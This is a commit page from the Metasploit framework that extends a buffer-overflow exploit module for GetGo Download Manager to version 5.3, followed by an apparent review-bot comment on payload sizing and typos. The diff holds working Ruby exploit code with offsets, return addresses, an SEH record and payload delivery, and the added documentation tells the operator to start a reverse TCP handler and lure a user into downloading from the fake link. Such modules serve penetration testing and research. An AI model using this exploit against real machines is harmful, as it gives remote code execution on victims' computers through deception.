Land #9642, support version 5 for GetGo Download Manager bof exploit

4.x
Wei Chen 2018-10-15 15:47:35 -05:00 committed by Metasploit
parent 52a919c361
commit 7d04ebcf5f
No known key found for this signature in database
GPG Key ID: CDFB5FA52007B954
2 changed files with 87 additions and 101 deletions


@ -0,0 +1,30 @@
## Description
This modules adds a buffer overflow exploit for GetGo Download Manager, which supports
4.9.0.1982 and 5.3.0.2712. Versions prior should also be vulnerable.
This exploit has been tested on Windows XP SP3. The vulnerable software can be downloaded
at [GetGo Download Manager 5.3.0.2712](https://www.exploit-db.com/apps/b26d82eadef93531f8beafac6105ef13-GetGoDMSetup.exe)
To use this, first start the module like the following example:
```
msf5 exploit(windows/browser/getgodm_http_response_bof) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.0.12:4444
msf5 exploit(windows/browser/getgodm_http_response_bof) > [*] Using URL: http://0.0.0.0:8080/shakeitoff.mp3
[*] Local IP: http://192.168.0.12:8080/shakeitoff.mp3
[*] Server started.
```
The exploit should give you a fake link. Pass this link to the Getgo user, and instruct them to
do the following:
1. Start GetGo Download Manager
2. Click on the DOWNLOAD button
3. Click on New (if the link is already copied to the clipboard, clicking on this should trigger
the download, and get exploited).
4. If the link isn't in the clipboard, instruct the user to enter the URL in the URL field, and
click OK. The user should also get exploited this way.


@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
'Name' => 'GetGo Download Manager HTTP Response Buffer Overflow', 'Name' => 'GetGo Download Manager HTTP Response Buffer Overflow',
'Description' => %q{ 'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability in This module exploits a stack-based buffer overflow vulnerability in
GetGo Download Manager version 4.9.0.1982 and earlier, caused by an GetGo Download Manager version 5.3.0.2712 earlier, caused by an
overly long HTTP response header. overly long HTTP response header.
By persuading the victim to download a file from a malicious server, a By persuading the victim to download a file from a malicious server, a
@ -26,7 +26,9 @@ class MetasploitModule < Msf::Exploit::Remote
'Author' => 'Author' =>
[ [
'Julien Ahrens', # Vulnerability discovery 'Julien Ahrens', # Vulnerability discovery
'Gabor Seljan' # Metasploit module 'Gabor Seljan', # Metasploit module for v4
'bzyo', # Metasploit module for v5
'sinn3r' # Helping Gabor and bzyo (see #4588 & #9642)
], ],
'References' => 'References' =>
[ [
@ -42,16 +44,33 @@ class MetasploitModule < Msf::Exploit::Remote
'Platform' => 'win', 'Platform' => 'win',
'Payload' => 'Payload' =>
{ {
'BadChars' => "\x00\x0a\x0d", # v5 has no bad chars
'Space' => 2000 'BadChars' => "\x00\x0a\x0d"
}, },
'Targets' => 'Targets' =>
[ [
[ 'Windows XP SP3', [
'Automatic', {}
],
[ '4.9.0.1982 on Windows XP SP3',
{ {
'Offset' => 4107, 'Offset' => 4107,
'Ret' => 0x00280b0b # CALL DWORD PTR SS:[EBP+30] 'Ret' => 0x00280b0b # CALL DWORD PTR SS:[EBP+30]
} }
],
[
'5.3.0.2712 on Windows XP SP3',
{
'Offset' => 4095,
# 0:016> u 0x72d11f39
# msacm32!wodMessage+0xd0f:
# 72d11f39 5f pop edi
# 72d11f3a 5e pop esi
# 72d11f3b c20400 ret 4
'Ret' => 0x72d11f39,
# 12253 is the same size the python PoC used
'MaxSize' => 12253
}
] ]
], ],
'Privileged' => false, 'Privileged' => false,
@ -59,102 +78,11 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultTarget' => 0)) 'DefaultTarget' => 0))
end end
# # This part is from Gabor Seljan
# Handle the HTTP request and return a response. def exploit_v4(cli, current_taget)
# Code borrowed from: msf/core/exploit/http/server.rb sploit = rand_text_alpha(current_taget['Offset'])
#
def start_http(opts={})
# Ensture all dependencies are present before initializing HTTP
use_zlib
comm = datastore['ListenerComm']
if (comm.to_s == "local")
comm = ::Rex::Socket::Comm::Local
else
comm = nil
end
# Default the server host / port
opts = {
'ServerHost' => datastore['SRVHOST'],
'ServerPort' => datastore['HTTPPORT'],
'Comm' => comm
}.update(opts)
# Start a new HTTP server
@http_service = Rex::ServiceManager.start(
Rex::Proto::Http::Server,
opts['ServerPort'].to_i,
opts['ServerHost'],
datastore['SSL'],
{
'Msf' => framework,
'MsfExploit' => self
},
opts['Comm'],
datastore['SSLCert']
)
@http_service.server_name = datastore['HTTP::server_name']
# Default the procedure of the URI to on_request_uri if one isn't
# provided.
uopts = {
'Proc' => Proc.new { |cli, req|
on_request_uri(cli, req)
},
'Path' => resource_uri
}.update(opts['Uri'] || {})
proto = (datastore["SSL"] ? "https" : "http")
print_status("Using URL: #{proto}://#{opts['ServerHost']}:#{opts['ServerPort']}#{uopts['Path']}")
if (opts['ServerHost'] == '0.0.0.0')
print_status(" Local IP: #{proto}://#{Rex::Socket.source_address('1.2.3.4')}:#{opts['ServerPort']}#{uopts['Path']}")
end
# Add path to resource
@service_path = uopts['Path']
@http_service.add_resource(uopts['Path'], uopts)
# As long as we have the http_service object, we will keep the server alive
while @http_service
select(nil, nil, nil, 1)
end
end
#
# Kill HTTP/FTP (shut them down and clear resources)
#
def cleanup
super
stop_service
begin
@http_service.remove_resource(datastore['URIPATH'])
@http_service.deref
@http_service.stop
@http_service.close
@http_service = nil
rescue
end
end
def on_request_uri(cli, request)
print_status("Client connected...")
unless request['User-Agent'] =~ /GetGo Download Manager 4.0/
print_error("Sending 404 for unknown user-agent")
send_not_found(cli)
return
end
sploit = rand_text_alpha(target['Offset'])
sploit << "\x90\x90\xEB\x06" sploit << "\x90\x90\xEB\x06"
sploit << [target.ret].pack('V') sploit << [current_taget.ret].pack('V')
sploit << payload.encoded sploit << payload.encoded
print_status("Sending #{sploit.length} bytes to port #{cli.peerport}...") print_status("Sending #{sploit.length} bytes to port #{cli.peerport}...")
@ -162,8 +90,36 @@ class MetasploitModule < Msf::Exploit::Remote
resp = create_response(200, sploit) resp = create_response(200, sploit)
resp.body = "" resp.body = ""
cli.send_response(resp) cli.send_response(resp)
end
close_client(cli) # This part is from Auxilus with some help from @_sinn3r
def exploit_v5(cli, current_taget)
seh_record = generate_seh_record(current_taget.ret)
# Minus 4 for the SEH record
buffer = Rex::Text.rand_text_alpha(current_taget['Offset'] - 4)
buffer << seh_record
buffer << payload.encoded
buffer << Rex::Text.rand_text_alpha(current_taget['MaxSize'] - buffer.length)
res = create_response(200, buffer)
cli.send_response(res)
end
def on_request_uri(cli, request)
print_status("#{cli.peerhost} connected")
current_target = target
user_agent = request.headers['User-Agent'].to_s
if current_target == targets[1] || user_agent.match(/GetGo Download Manager 4\.0/)
print_status('Attempting to exploit against v4')
current_target = targets[1]
exploit_v4(cli, current_target)
elsif current_target == targets[2] || user_agent.match(/GetGo Download Manager 5\.0/)
print_status('Attempting to exploit against v5')
current_target = targets[2]
exploit_v5(cli, current_target)
else
print_error('Sending 404 for unknown user-agent')
send_not_found(cli)
end
end end
end end
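Review bot: In `exploit_v5`, `Rex::Text.rand_text_alpha(current_taget['MaxSize'] - buffer.length)` has no guard for `buffer.length` exceeding `MaxSize`, and as far as the rendered diff shows, the module-level `'Space' => 2000` appears only on the old side of the Payload hash, so nothing now bounds `payload.encoded` for either target. A payload larger than the remaining room appears to give an empty pad and a response longer than the 12253 bytes the PoC used, with no error to the operator; I would add `pad = current_taget['MaxSize'] - buffer.length` followed by `return print_error("Payload too large for #{current_taget.name}") if pad < 0` before the padding append, or give each target its own `'Payload' => { 'Space' => ... }` so the framework rejects an oversized payload up front. The parameter name `current_taget` in both helpers is a typo for `current_target` and reads oddly next to the correctly spelled local in `on_request_uri`. The new description string also drops a word: `GetGo Download Manager version 5.3.0.2712 and earlier`. The `close_client(cli)` call seems to be present only on the old side of the v4 handler; if the new `exploit_v4` really no longer closes the client after `cli.send_response(resp)`, that is worth confirming.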